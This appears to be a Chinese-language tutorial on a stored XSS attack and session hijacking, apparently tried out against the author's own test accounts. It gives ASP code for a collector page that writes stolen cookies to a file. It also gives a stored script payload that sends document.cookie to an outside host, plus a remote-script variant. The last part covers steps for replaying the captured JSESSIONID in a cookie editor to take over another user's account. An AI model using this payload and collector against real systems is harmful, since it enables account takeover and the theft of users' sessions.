一. 部署偷取session
1.安装IIS
我是windows 2003的,插入系统盘,控制面板,添加/删除windows组件,应用程序服务器,IIS在这里,安装好后,建立站点,也就选择主目录,首页等配置,这部分内容网上都有的,大学也学过的。
2.编写偷取cookie的代码
代码如下:
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cook.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs = nothing
%>
在iis部署公网能访问的目录下新建个文本,命名为s.asp,把以上代码复制进去。代码我也不是很看到懂。估计就是把返回的内容写在cook.txt这个文件里吧。
然后新建个文本,随便命名,输入内容如下:
<%
dim username
username=trim(request("username"))
Response.cookies("name")=username
Response.redirect "s.asp"
%>
这里的s.asp即上面的页面。
3.用我自己的帐号show/12345678登录(昵称我的账号),找到刚才存在xss漏洞的界面,新建,在标题栏里输入:
<script>document.write('<img src="http://192.168.1.60/s.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
因为标题字数做了限制100字符,所以我把上面的代码后半部分去除了,修改为:
<script>document.write('<img src="http://192.168.1.60/s.asp?msg='+document.cookie+'"/>');</script>
如果是
js:<script. src="http://192.168.1.60/a.js"/>
这里的s.asp就是上面部署新建的那个。估计意思就是把session返回到s.asp这个页面吧。
然后保存,这条记录是系统内所有用户都能看见的。保存后记录显示结果
其他用户(我这里是show2/12345678昵称为:被盗的帐号)点击记录
点击其实有访问s.asp页面,然后这个页面把session写入了cook.txt这个文件。
这时我们找到本地s.asp当前目录下,会自动生成一个cook.txt文件,打开,显示的内容如下:
msg=JSESSIONID=31D68F7A3B043ECA887216C3F285A7C4
这就是我们偷取的东西。
三. cookie欺骗
我下载了firefox 3.0.11版本的浏览器,并下载了一个可以修改cookie的插件,叫:Add N Edit Cookies,注:该插件不支持firefox 3.6版本,下载插件后,打开firefox直接把插件托进去就可以安装起来了。插件和firefox网上均有下载,还是好找到。
打开firefox,进去系统(,我用自己的帐号show/12345678登录
然后firefox工具菜单下面有一项叫Cookie Editor,就是刚才安装的插件,打开后如图:
找到对应的那条记录,JSESSIONID这项。点击下方的Edit,关闭,刷新页面即可
就变成了被偷取的账号了。